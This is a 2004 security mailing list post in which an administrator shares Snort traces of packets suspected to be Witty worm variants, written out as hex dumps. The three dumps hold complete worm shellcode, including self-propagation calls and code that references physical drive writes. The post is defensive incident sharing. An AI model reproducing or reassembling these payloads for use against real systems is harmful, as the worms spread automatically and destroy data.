Security Incidents mailing list archives
RE: new variant of witty worm ????
From: Steven Trewick <STrewick () joplings co uk>
Date: Wed, 24 Mar 2004 15:30:50 -0000
(Packet dump to follow ASAP)
As promised, here are my snort traces for the weird packets that look very much like mutated/mangled versions of the 'witty' worm. There are two of the 'variant' packets, then one which looks like the same traffic that we saw on Saturday (Although I have not had time to confirm this yet) 03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434 UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404 Len: 376 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p. 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h.. B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5. 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt. BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP.. 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P. 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........ C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j.. 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P 8B 45 AC 50 FF D6 EB CA .E.P.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/22-22:26:10.414371 128.11.41.149:2386 -> 192.168.0.88:1434 UDP TTL:109 TOS:0x0 ID:1650 IpLen:20 DgmLen:404 Len: 376 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p. 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h.. B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5. 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt. BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP.. 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P. 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........ C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j.. 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P 8B 45 AC 50 FF D6 EB CA .E.P.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/22-22:31:15.196762 155.69.109.158:4000 -> 192.168.0.88:44802 UDP TTL:101 TOS:0x0 ID:2427 IpLen:20 DgmLen:840 Len: 812 05 00 00 00 00 00 00 12 02 00 00 00 00 00 00 00 ................ 00 00 00 00 00 02 2C 00 05 00 00 00 00 00 00 6E ......,........n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 41 02 05 00 00 00 00 00 00 DE 03 00 ....A........... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 ................ 00 01 00 00 01 00 00 1E 02 20 20 20 20 20 20 20 ......... 28 5E 2E 5E 29 20 20 20 20 20 20 69 6E 73 65 72 (^.^) inser 74 20 77 69 74 74 79 20 6D 65 73 73 61 67 65 20 t witty message 68 65 72 65 2E 20 20 20 20 20 20 28 5E 2E 5E 29 here. (^.^) 20 20 20 20 20 20 20 89 E7 8B 7F 14 83 C7 08 81 ......... C4 E8 FD FF FF 31 C9 66 B9 33 32 51 68 77 73 32 .....1.f.32Qhws2 5F 54 3E FF 15 9C 40 0D 5E 89 C3 31 C9 66 B9 65 _T>...@.^..1.f.e 74 51 68 73 6F 63 6B 54 53 3E FF 15 98 40 0D 5E tQhsockTS>...@.^ 6A 11 6A 02 6A 02 FF D0 89 C6 31 C9 51 68 62 69 j.j.j.....1.Qhbi 6E 64 54 53 3E FF 15 98 40 0D 5E 31 C9 51 51 51 ndTS>...@.^1.QQQ 81 E9 FE FF F0 5F 51 89 E1 6A 10 51 56 FF D0 31 ....._Q..j.QV..1 C9 66 B9 74 6F 51 68 73 65 6E 64 54 53 3E FF 15 .f.toQhsendTS>.. 98 40 0D 5E 89 C3 83 C4 3C 31 C9 51 68 65 6C 33 .@.^....<1.Qhel3 32 68 6B 65 72 6E 54 3E FF 15 9C 40 0D 5E 31 C9 2hkernT>...@.^1. 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54 QhounthickChGetT 54 50 3E FF 15 98 40 0D 5E FF D0 89 C5 83 C4 1C TP>...@.^....... 31 C9 81 E9 E0 B1 FF FF 51 31 C0 2D 03 BC FC FF 1.......Q1.-.... F7 E5 2D 3D 61 D9 FF 89 C1 31 C0 2D 03 BC FC FF ..-=a....1.-.... F7 E1 2D 3D 61 D9 FF 89 C5 31 D2 52 52 C1 E9 10 ..-=a....1.RR... 66 89 C8 50 31 C0 2D 03 BC FC FF F7 E5 2D 3D 61 f..P1.-......-=a D9 FF 89 C5 30 E4 B0 02 50 89 E0 6A 10 50 31 C0 ....0...P..j.P1. 50 2D 03 BC FC FF F7 E5 2D 3D 61 D9 FF 89 C5 C1 P-......-=a..... E8 17 80 C4 03 50 57 56 FF D3 83 C4 10 59 E2 98 .....PWV.....Y.. 31 C0 2D 03 BC FC FF F7 E5 2D 3D 61 D9 FF 89 C5 1.-......-=a.... C1 E8 10 80 E4 07 80 CC 30 B0 45 50 68 44 52 49 ........0.EPhDRI 56 68 49 43 41 4C 68 50 48 59 53 68 5C 5C 2E 5C VhICALhPHYSh\\.\ 89 E0 31 C9 51 B2 20 C1 E2 18 52 6A 03 51 6A 03 ..1.Q. ...Rj.Qj. D1 E2 52 50 3E FF 15 DC 40 0D 5E 83 C4 14 31 C9 ..RP>...@.^...1. 81 E9 E0 B1 FF FF 3D FF FF FF FF 0F 84 37 FF FF ......=......7.. FF 56 89 C6 31 C0 50 50 2D 03 BC FC FF F7 E5 2D .V..1.PP-......- 3D 61 D9 FF 89 C5 D1 E8 66 89 C8 50 56 3E FF 15 =a......f..PV>.. C4 40 0D 5E 31 C9 51 89 E2 51 52 B5 80 D1 E1 51 .@.^1.Q..QR....Q B1 5E C1 E1 18 51 56 3E FF 15 94 40 0D 5E 56 3E .^...QV>...@.^V> FF 15 38 40 0D 5E 5E 5E E9 AC FE FF FF 63 76 07 ..8@.^^^.....cv. 5E E9 21 FE FF FF 00 43 66 6A 76 63 6C 62 34 31 ^.!....Cfjvclb41 50 51 35 30 6A 48 31 50 63 34 50 51 55 59 48 78 PQ50jH1Pc4PQUYHx 37 74 65 4F 7A 54 53 54 59 54 65 4C 4D 41 0D 0A 7teOzTSTYTeLMA.. 44 6C 44 33 52 37 6C 56 74 42 43 75 6B 6B 68 64 DlD3R7lVtBCukkhd 7A 2B 32 76 6F 75 30 33 41 63 35 57 4F 52 6B 75 z+2vou03Ac5WORku 71 72 67 64 4B 72 75 31 5A 49 4F 43 6C 53 52 2F qrgdKru1ZIOClSR/ 78 51 4F 69 4B 6F 36 48 7A 4A 75 67 52 72 49 34 xQOiKo6HzJugRrI4 73 37 4F 6B 53 4B 77 50 71 4C 75 34 0D 0A 35 62 s7OkSKwPqLu4..5b 61 4E 62 52 30 67 50 4E 59 50 40 00 34 06 B6 62 aNbR0gPNYP@.4..b 40 44 52 19 92 8E 01 A0 11 00 07 00 46 00 00 00 @DR.........F... 46 00 00 00 80 00 00 00 02 00 00 00 F........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ </code> The information contained in this e-mail is confidential and may be privileged, it is intended for the addressee only. If you have received this e-mail in error please delete it from your system. The statements and opinions expressed in this message are those of the author and do not necessarily reflect those of the company. Whilst Joplings Group operates an e-mail anti-virus program it does not accept responsibility for any damage whatsoever that is caused by viruses being passed. joplings.co.uk --------------------------------------------------------------------------- Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN, wireless security Protect your network against hackers, viruses, spam and other risks with Astaro Security Linux, the comprehensive security solution that combines six applications in one software solution for ease of use and lower total cost of ownership. Download your free trial at http://www.securityfocus.com/sponsor/Astaro_incidents_040301 ----------------------------------------------------------------------------
Current thread:
- new variant of witty worm ???? Steven Trewick (Mar 23)
- <Possible follow-ups>
- RE: new variant of witty worm ???? Steven Trewick (Mar 24)
- RE: new variant of witty worm ???? Kowsik Guruswamy (Mar 24)
- Re: new variant of witty worm ???? Gadi Evron (Mar 24)